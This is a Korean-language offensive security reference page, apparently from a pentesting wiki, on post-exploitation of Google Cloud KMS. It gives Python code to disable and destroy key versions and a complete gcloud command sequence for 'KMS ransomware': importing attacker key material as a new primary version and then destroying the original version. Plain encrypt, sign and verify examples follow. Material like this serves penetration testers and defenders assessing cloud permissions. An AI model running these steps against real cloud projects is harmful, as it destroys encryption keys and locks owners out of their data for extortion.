GCP - KMS Post Exploitation
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KMS에 대한 기본 정보를 찾으세요:
GCP - KMS Enumcloudkms.cryptoKeyVersions.destroy
이 권한을 가진 공격자는 KMS 버전을 파괴할 수 있습니다. 이를 위해서는 먼저 키를 비활성화한 다음 파괴해야 합니다:
# pip install google-cloud-kms
from google.cloud import kms
def disable_key_version(project_id, location_id, key_ring_id, key_id, key_version):
Disables a key version in Cloud KMS.
# Create the client.
client = kms.KeyManagementServiceClient()
# Build the key version name.
key_version_name = client.crypto_key_version_path(project_id, location_id, key_ring_id, key_id, key_version)
# Call the API to disable the key version.
client.update_crypto_key_version(request={'crypto_key_version': {'name': key_version_name, 'state': kms.CryptoKeyVersion.State.DISABLED}})
def destroy_key_version(project_id, location_id, key_ring_id, key_id, key_version):
Destroys a key version in Cloud KMS.
# Create the client.
client = kms.KeyManagementServiceClient()
# Build the key version name.
key_version_name = client.crypto_key_version_path(project_id, location_id, key_ring_id, key_id, key_version)
# Call the API to destroy the key version.
client.destroy_crypto_key_version(request={'name': key_version_name})
# Example usage
project_id = 'your-project-id'
location_id = 'your-location'
key_ring_id = 'your-key-ring'
key_id = 'your-key-id'
key_version = '1' # Version number to disable and destroy
# Disable the key version
disable_key_version(project_id, location_id, key_ring_id, key_id, key_version)
# Destroy the key version
destroy_key_version(project_id, location_id, key_ring_id, key_id, key_version)
AWS에서는 KMS 리소스 정책을 수정하여 공격자의 계정만 키를 사용할 수 있도록 함으로써 KMS 키를 완전히 탈취하는 것이 가능합니다. GCP에는 이러한 리소스 정책이 존재하지 않기 때문에 이는 불가능합니다.
그러나 글로벌 KMS 랜섬웨어를 수행하는 또 다른 방법이 있으며, 이는 다음 단계를 포함합니다:
공격자가 가져온 키 자료로 키의 새 버전을 생성합니다.
gcloud kms import-jobs create [IMPORT_JOB] --location [LOCATION] --keyring [KEY_RING] --import-method [IMPORT_METHOD] --protection-level [PROTECTION_LEVEL] --target-key [KEY]
기본 버전으로 설정 (향후 암호화될 데이터에 대해)
이전 버전으로 암호화된 구버전 데이터 재암호화
KMS 키 삭제
이제 원래 키 자료를 가진 공격자만 암호화된 데이터를 복호화할 수 있습니다.
# Encrypt something with the original key
echo "This is a sample text to encrypt" > /tmp/my-plaintext-file.txt
gcloud kms encrypt \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key \
--plaintext-file my-plaintext-file.txt \
--ciphertext-file my-encrypted-file.enc
# Decrypt it
gcloud kms decrypt \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key \
--ciphertext-file my-encrypted-file.enc \
--plaintext-file -
# Create an Import Job
gcloud kms import-jobs create my-import-job \
--location us-central1 \
--keyring kms-lab-2-keyring \
--import-method "rsa-oaep-3072-sha1-aes-256" \
--protection-level "software"
# Generate key material
openssl rand -out my-key-material.bin 32
# Import the Key Material (it's encrypted with an asymetrict key of the import job previous to be sent)
gcloud kms keys versions import \
--import-job my-import-job \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key \
--algorithm "google-symmetric-encryption" \
--target-key-file my-key-material.bin
# Get versions
gcloud kms keys versions list \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key
# Make new version primary
gcloud kms keys update \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key \
--primary-version 2
# Try to decrypt again (error)
gcloud kms decrypt \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key \
--ciphertext-file my-encrypted-file.enc \
--plaintext-file -
# Disable initial version
gcloud kms keys versions disable \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key 1
# Destroy the old version
gcloud kms keys versions destroy \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key \
--version 1
| cloudkms.cryptoKeyVersions.useToEncryptViaDelegation
from google.cloud import kms
import base64
def encrypt_symmetric(project_id, location_id, key_ring_id, key_id, plaintext):
Encrypts data using a symmetric key from Cloud KMS.
# Create the client.
client = kms.KeyManagementServiceClient()
# Build the key name.
key_name = client.crypto_key_path(project_id, location_id, key_ring_id, key_id)
# Convert the plaintext to bytes.
plaintext_bytes = plaintext.encode('utf-8')
# Call the API.
encrypt_response = client.encrypt(request={'name': key_name, 'plaintext': plaintext_bytes})
ciphertext = encrypt_response.ciphertext
# Optional: Encode the ciphertext to base64 for easier handling.
return base64.b64encode(ciphertext)
# Example usage
project_id = 'your-project-id'
location_id = 'your-location'
key_ring_id = 'your-key-ring'
key_id = 'your-key-id'
plaintext = 'your-data-to-encrypt'
ciphertext = encrypt_symmetric(project_id, location_id, key_ring_id, key_id, plaintext)
print('Ciphertext:', ciphertext)
import hashlib
from google.cloud import kms
def sign_asymmetric(project_id, location_id, key_ring_id, key_id, key_version, message):
Sign a message using an asymmetric key version from Cloud KMS.
# Create the client.
client = kms.KeyManagementServiceClient()
# Build the key version name.
key_version_name = client.crypto_key_version_path(project_id, location_id, key_ring_id, key_id, key_version)
# Convert the message to bytes and calculate the digest.
message_bytes = message.encode('utf-8')
digest = {'sha256': hashlib.sha256(message_bytes).digest()}
# Call the API to sign the digest.
sign_response = client.asymmetric_sign(name=key_version_name, digest=digest)
return sign_response.signature
# Example usage for signing
project_id = 'your-project-id'
location_id = 'your-location'
key_ring_id = 'your-key-ring'
key_id = 'your-key-id'
key_version = '1'
message = 'your-message'
signature = sign_asymmetric(project_id, location_id, key_ring_id, key_id, key_version, message)
print('Signature:', signature)
from google.cloud import kms
import hashlib
def verify_asymmetric_signature(project_id, location_id, key_ring_id, key_id, key_version, message, signature):
Verify a signature using an asymmetric key version from Cloud KMS.
# Create the client.
client = kms.KeyManagementServiceClient()
# Build the key version name.
key_version_name = client.crypto_key_version_path(project_id, location_id, key_ring_id, key_id, key_version)
# Convert the message to bytes and calculate the digest.
message_bytes = message.encode('utf-8')
digest = {'sha256': hashlib.sha256(message_bytes).digest()}
# Build the verify request and call the API.
verify_response = client.asymmetric_verify(name=key_version_name, digest=digest, signature=signature)
return verify_response.success
# Example usage for verification
verified = verify_asymmetric_signature(project_id, location_id, key_ring_id, key_id, key_version, message, signature)
print('Verified:', verified)
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